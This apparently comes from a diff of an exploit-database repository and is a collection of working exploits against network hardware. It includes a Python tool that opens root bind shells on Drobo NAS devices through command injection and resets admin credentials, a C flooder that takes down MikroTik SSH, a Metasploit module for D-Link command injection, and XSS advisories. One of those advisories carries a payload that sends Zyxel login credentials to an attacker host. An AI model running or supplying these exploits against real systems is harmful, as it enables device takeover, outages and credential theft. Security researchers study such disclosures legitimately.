init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
i = 0;
do {
current_byte = (datum + 0x310)[i];
i = i + 1;
cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
dst = (byte *)dst + 0x30;
} while (i != 0x10);
return;
}
void cipher_xor(byte *data,byte *key,int size)
{
int i;
i = 0;
while (i < size) {
data[i] = key[i] ^ data[i];
i = i + 1;
}
return;
}
void prepare_key(void *key,size_t key_size)
{
size_t __n;
memset(state + 0x1d0,0,0x10);
__n = key_size;
if (0xf < (int)key_size) {
__n = 0x10;
}
memcpy(state + 0x1d0,key,__n);
init_cipher_state(state + 0x1e0,state + 0x1d0);
if (8 < (int)key_size) {
init_cipher_state(state + 0x4e0,state + 0x1d8);
}
*(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
return;
}
void cipher_shuffle(byte *dst,byte *src)
{
byte *caretPtr;
int iVar1;
byte *ptr;
int i;
apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
cipher_xor(state + 0x100,src,0x30);
ptr = state + 0x100;
i = 0;
do {
iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
caretPtr = dst + i;
i = i + 4;
init_cipher_offset_vector
(caretPtr,datum + 0x30 +
(uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
iVar1 * 0x10,4);
ptr = ptr + 6;
} while (i != 0x20);
apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
return;
}
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)
{
uint i;
byte *backward_ov_ptr;
byte *forward_ov_ptr;
int iVar3;
init_cipher_offset_vector(state + 0x130,data,0x40);
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
if (direction == 0) {
forward_ov_ptr = offset_vector + 0x300;
do {
memcpy(state + 0x170,state + 0x150,0x20);
cipher_shuffle(state + 0x150,offset_vector);
cipher_xor(state + 0x150,state + 0x130,0x20);
memcpy(state + 0x130, state + 0x170, 0x20);
offset_vector = offset_vector + 0x30;
} while (offset_vector != forward_ov_ptr);
}
else {
backward_ov_ptr = offset_vector + 0x2d0;
do {
memcpy(state + 0x170,state + 0x130,0x20);
cipher_shuffle(state + 0x130,backward_ov_ptr);
cipher_xor(state + 0x130,state + 0x150,0x20);
backward_ov_ptr -= 0x30;
memcpy(state + 0x150,state + 0x170,0x20);
} while (backward_ov_ptr != offset_vector + -0x30);
}
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
memset(result,0,8);
i = 0;
do {
result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
i = i + 1;
} while (i != 0x40);
return;
}
int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)
{
uint short_key_iter;
int curBlockNumber;
int blockCount;
if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
&& ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_len);
blockCount = (int)(data_len + 7) >> 3;
short_key_iter = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)short_key_iter < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
short_key_iter = short_key_iter + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (curBlockNumber < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
curBlockNumber = curBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)
{
uint uVar2;
int currentBlockNumber;
int blocksCount;
if (((result != (char *)0x0 && data != (char *)0x0) &&
(currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_size);
blocksCount = (int)(data_len + 7) >> 3;
uVar2 = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)uVar2 < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
uVar2 = uVar2 + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (currentBlockNumber < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
currentBlockNumber = currentBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
{
unsigned char * pin = in;
const char * hex = "0123456789ABCDEF";
char * pout = out;
for(; pin < in+insz; pout +=3, pin++){
pout[0] = hex[(*pin>>4) & 0xF];
pout[1] = hex[ *pin & 0xF];
pout[2] = ':';
if (pout + 3 - out > outsz){
/* Better to truncate output string than overflow buffer */
/* it would be still better to either return a status */
/* or ensure the target buffer is large enough and it never happen */
break;
}
}
pout[-1] = 0;
}
char netbuf[4096];
#define PADDED(X) (((X + 7) / 8) * 8)
#define PORT 9530
#define BUFSIZE sizeof(netbuf)
#define CMD_FIRST "OpenTelnet:OpenOnce"
#define CHALLENGE_PROLOGUE "randNum:"
#define VERIFY_OK "verify:OK"
#define CMD_FINAL "CMD:"
#define FINAL_PAYLOAD "Telnet:OpenOnce"
#define OPEN_OK "Open:OK"
ssize_t send_str(int sockfd, char *str, size_t len) {
if (len > 0xFE) {
return -1;
}
char buf[len+1];
buf[0] = len + 1;
memcpy(buf + 1, str, len);
return send(sockfd, buf, len + 1, 0);
}
int main(int argc, char* argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
return 2;
}
if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
herror("gethostbyname");
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
}
their_addr.sin_family = AF_INET; /* host byte order */
their_addr.sin_port = htons(PORT); /* short, network byte order */
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */
if (connect(sockfd, (struct sockaddr *)&their_addr, \
sizeof(struct sockaddr)) == -1) {
perror("connect");
return 1;
}
if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
perror("send");
return 1;
}
printf("Sent %s command.\n", CMD_FIRST);
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
fprintf(stderr, "No challenge received.\n");
return 3;
}
char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
printf("challenge=%s\n", challengeStr);
char encryptedRandomSeed[PADDED(challengeLen)];
encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
fprintf(stderr, "Verification failed.\n");
return 4;
}
char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
fprintf(stderr, "Open failed.\n");
return 5;
}
return 0;
}
#

247
exploits/hardware/remote/48214.py Executable file
View file

@ -0,0 +1,247 @@
# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection
# Date: 2020-03-12
# Exploit Author: Rick Ramgattie, Ian Sindermann
# Vendor Homepage: https://www.drobo.com/
# Version: 4.1.1 and lower.
# CVE: CVE-2018-14709, CVE-2018-14701
###
#!/usr/bin/env python3
# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.
# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions.
# These actions include:
# - Getting device status.
# - Installing applications.
# - Resetting admin credentials.
# - Popping root shells.
# - Turning on party mode.
# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower.
# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified.
# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified.
# These vulnerabilities were disclosed to the manufacturer on 2018-07-10.
# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc
###
# Product of ISE Labs.
# - http://www.securityevaluators.com/
# - @ISESecurity
###
# RE Notes:
# ,-- Encryption bool?
# Handshake Preamble: * /\
# 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88
# \_____________________/ \_________/ \_________/
# Static string. To/from Size of
# "DIRNETTM" server? next message
#
# Handshake
# 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00...
# \______________________________________________/ \_________/ \_______________________________________________/ \_________________-->
# Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 88 bytes of NULL
# "dra173202300010" "dra173202300010"
#
# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2).
# One of the serial numbers in this packet may actually be the ESAID.
#
# Preamble: *
# 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88
# \_____________________/ \_________/ \_________/
# Static string. To/from Size of
# "DIRNETTM" server? next message
#
# Message:
# XX XX XX XX XX XX XX XX 00
# \_____________________/ \/
# Arbitrary length string NULL terminator
#
#
# Protocol flow:
# Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why?
# | c -> s: Preamble. <-' \_
# | c -> s: Message: Handshake / `- These two are normally sent as one packet.
# v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why?
# Loop:
# +> c -> s: Preamble.
# | c -> s: Message: Command.
# | c <- s: Preamble.
# +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble.
import argparse
import logging
import re
import socket
import struct
import sys
LOG_FORMAT = '[%(levelname)s]: %(message)s'
BUFFER_SIZE = 1024
HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00'
PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00'
PREAMBLE_LEN = 16
# Note: Payloads usually contain the device's serial number. Replace this with
# '{serial}' so `send_msg` can insert the target's serial.
PAYLOADS = {
"daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
"getnet" :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>',
"gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>',
"partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
"partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
"popit" :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>',
"setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
"test" :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>',
"stdin" :'Handled elsewhere.'}
DEFAULT_PORT_STAT = 5000
DEFAULT_PORT_CMD = 5001
DEFAULT_TIMEOUT = None
HELP_EPILOG='''
PAYLOADS
daccess - Installs DroboAccess on the target device. At the time of writing,
DroboAccess has numerous unauthenticated command injection
vulnerabilities. Try the following:
GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383
- A long delay and response of "<Error>0</Error>" is expected.
dropbear - Installs dropbear on the target device.
- A response of "<Error>0</Error>" is expected.
getadmin - Returns the target's current (redacted) admin configuration.
gettemp - Returns the target's system info (temperature and uptime).
getnet - Returns the target's network info.
partyon - Enables "party mode" on the target. This will cause the target
device's lights to blink for 15 minutes.
partyoff - Prematurely disables "party mode".
popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383.
- A response of "<Error>1</Error>" is expected.
restart - Restarts the target device.
setadmin - Sets administrative options on the target.
- Username: admin
- Password: ono
- Apps enabled: yes
stdin - Reads data from STDIN and sends it as a command.
'''
def recv_message(s):
preamble = s.recv(PREAMBLE_LEN)
msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble.
message = ''
if msg_len <= 0:
return(message)
while True:
message += s.recv(BUFFER_SIZE).decode('utf-8')
if len(message) >= msg_len:
return(message) # There will be a null at the end. It should be fine.
def send_handshake(s, serial):
serial_bytes = serial.encode('utf-8')
hs_body = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number.
hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero.
hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again...
hs_body += struct.pack("184x") # 184 bytes of NULL padding.
size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble.
hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body
logging.debug(repr(hs_data))
s.send(hs_data)
def send_message(s, serial, message):
msg_body = message.format(serial=serial) # Add target device's serial number.
msg_body_bytes = msg_body.encode('utf-8')
msg_body_bytes += struct.pack("x") # NULL terminator.
size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble.
msg_data = PREAMBLE + size_bytes + msg_body_bytes
logging.debug(repr(msg_data))
s.send(msg_data)
aparser = argparse.ArgumentParser(
description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.',
epilog=HELP_EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter)
aparser.add_argument("host", help='Host or IP address of the target Drobo.')
aparser.add_argument("payload", help='Payload to use. See PAYLOADS.')
aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int)
aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int)
aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.')
aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float)
aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true')
args = aparser.parse_args()
# Basic check for color support.
if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]:
logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m")
logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m")
logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m")
logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m")
logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m")
logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m")
else:
logging.addLevelName(logging.NOTSET, "????")
logging.addLevelName(logging.DEBUG, "DBUG")
logging.addLevelName(logging.INFO, "INFO")
logging.addLevelName(logging.WARNING, "WARN")
logging.addLevelName(logging.ERROR, "ERRR")
logging.addLevelName(logging.CRITICAL, "CRIT")
if args.verbose:
logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
else:
logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)
if args.payload == 'stdin':
logging.info("Reading payload from STDIN.")
payload_xml = sys.stdin.read()
logging.debug(payload_xml)
else:
payload_xml = PAYLOADS[args.payload]
logging.info("Connecting...")
# Connect to the stat port. This is required for the cmd port to work.
# The stat port also gives us the serial number.
sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_stat.settimeout(args.timeout)
sock_stat.connect((args.host, args.portstat))
# Connect to the cmd port.
sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_cmd.settimeout(args.timeout)
sock_cmd.connect((args.host, args.portcmd))
# Pull the serial number from the stat port.
logging.info("Pulling serial number...")
stat_msg = sock_stat.recv(BUFFER_SIZE)
if args.serial:
serial = args.serial
else:
m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
if not m:
logging.critical("Could not determine target's serial number!")
logging.debug(stat_msg)
sys.exit(100)
serial = m.group(1)
logging.info("Identified serial: " + serial)
# Perform a handshake with the cmd port. Requires the serial num.
logging.info('Performing handshake...')
send_handshake(sock_cmd, serial)
recv_message(sock_cmd) # Blank response - trash.
# Send the payload.
logging.info("Sending payload...")
send_message(sock_cmd, serial, payload_xml)
logging.info("Waiting for response...")
resp = recv_message(sock_cmd)
logging.info("Response:\n" + resp)
# Cleanup.
sock_cmd.close()
sock_stat.close()
logging.info("Donezo.")

103
exploits/hardware/remote/48228.txt Normal file
View file

@ -0,0 +1,103 @@
# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
# Author: Hosein Askari
# Date: 2020-03-18
# Vendor Homepage: https://mikrotik.com/
# Model: hAP lite
# Processor architecture: smips
# Affected Version: through 6.44.3
# CVE: N/A
#Description:
An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
#details:
The issue reported in 02/25/2020 to the Mikrotik
First response by Mikrotik in 02/26/2020
The additional information about exploit and PoC video sent in 02/26/2020
The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
#PoC:
#Mitigation:
It can be mitigated with firewall filter and service port restrictions.
Solution:
Hardening and tuning the daemon for these 2 parameters:
1- Number of allowed unauthenticated connections to ssh daemon
2- Maximum number of connections at which we start dropping everything for ssh daemon
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MAX_CON 32
#define MAX_THREADS 16
int Socket(char *ip, char *port) {
struct addrinfo hints, *ret, *p;
int sock, r;
ssize_t bytes;
char buffer[2048];
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
return EXIT_FAILURE;
}
for(p = ret; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(ret)
freeaddrinfo(ret);
fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port);
return sock;
}
void signal_callback_handler(int signum){
printf("Caught signal SIGPIPE %d\n",signum);
}
void mal(char *ip, char *port, int id) {
int sockets[MAX_CON];
int i, g=1, r;
for(i=0; i!= MAX_CON; i++)
sockets[i]=0;
signal(SIGPIPE, signal_callback_handler);
while(1) {
for(i=0; i!= MAX_CON; i++) {
if(sockets[i] == 0)
sockets[i] = Socket(ip, port);
r=write(sockets[i], "\0", 1);
if(r == -1) {
close(sockets[i]);
sockets[i] = Socket(ip, port);
}
}
usleep(200000);
}
}
int main(int argc, char **argv) {
int i;
for(i=0; i!= MAX_THREADS; i++) {
if(fork())
mal(argv[1], argv[2], i);
usleep(200000);
}
getc(stdin);
return 0;
}
#########
Sincerely,
Hosein Askari

138
exploits/hardware/remote/48274.rb Executable file
View file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
end
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end

2
exploits/hardware/webapps/46240.html
View file

@ -4,7 +4,7 @@
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @god3err
# Twitter : @alicangonullu
Exploits :
-->

33
exploits/hardware/webapps/46667.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Reflected HTML Injection
# Google Dork: None
# Date: 16/12/2015
# Exploit Author: Ramikan
# Vendor Homepage:https://www.salicru.com/en/
# Software Link: N/A
# Version: Tested on SaLICru -SLC-20-cube3(5).
# Firmware: cs121-SNMP v4.54.82.130611
# CVE : CVE-2019-10887
# Category:Web Apps
Vulnerability: Reflected HTML Injection
Vendor Web site:
Version tested:cs121-SNMP v4.54.82.130611
Solution: N/A
Note:Default credential:admin/admin or admin/cs121-snmp
Victim need to be authenticated in order to get affected by this.
Vulnerability 1:Refelected HTML Injection
Affected URL:
/DataLog.csv?log=
/AlarmLog.csv?log=
/waitlog.cgi?name=
/chart.shtml?data=
/createlog.cgi?name=
Affected Parameter: log, name, data
Payload: <h1>HTML Injection</h1>

16
exploits/hardware/webapps/46687.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Multiple Stored and Reflected XSS vulnerabilities in D-Link DI-524
# Date: April 6, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: https://www.dlink.com
# Version: D-Link DI-524 - V2.06RU
# CVE : CVE-2019-11017
To re-create Reflected XSS vulnerability, log in to the Web Configuration (default credentials are: "admin":"" without double quotes), and send GET request to the router with malformed vulnerable parameter:
http://$IP/cgi-bin/smap?RC=@smap%22-$PAYLOAD-%22&rd=x&SEO=o&AC=O&SnO=1&SHO=2&StO=1&SpO=1&SPO=1
Where $IP may be equal to "192.168.0.1", $PAYLOAD may be equal to "alert(document.location)".
Stored XSS's were found in web forms on pages /spap.htm, /smap.htm. To inject malicious JavaScript to victim's webpage, an attacker should authorize on the router, then put a payload to any of the vulnerable forms, and wait, until victim opens router's web interface and goes to vulnerable page.
I haven't tested all the admin panel of the router, so I can guess that there are other XSS vulnerabilities in this router.

80
exploits/hardware/webapps/46706.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955
1. Description
==============
Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.
2. Proof of Concept
=============
Host a malicious file JavaScript file named 'z', or any other single character,
locally. The contents of 'z' for the following example are:
-----
$("button").click(function() {
$.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----
Close the mp_idx variable with "; and Use the getScript functionality of jQuery
to include the malicious file:
Request:
GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957
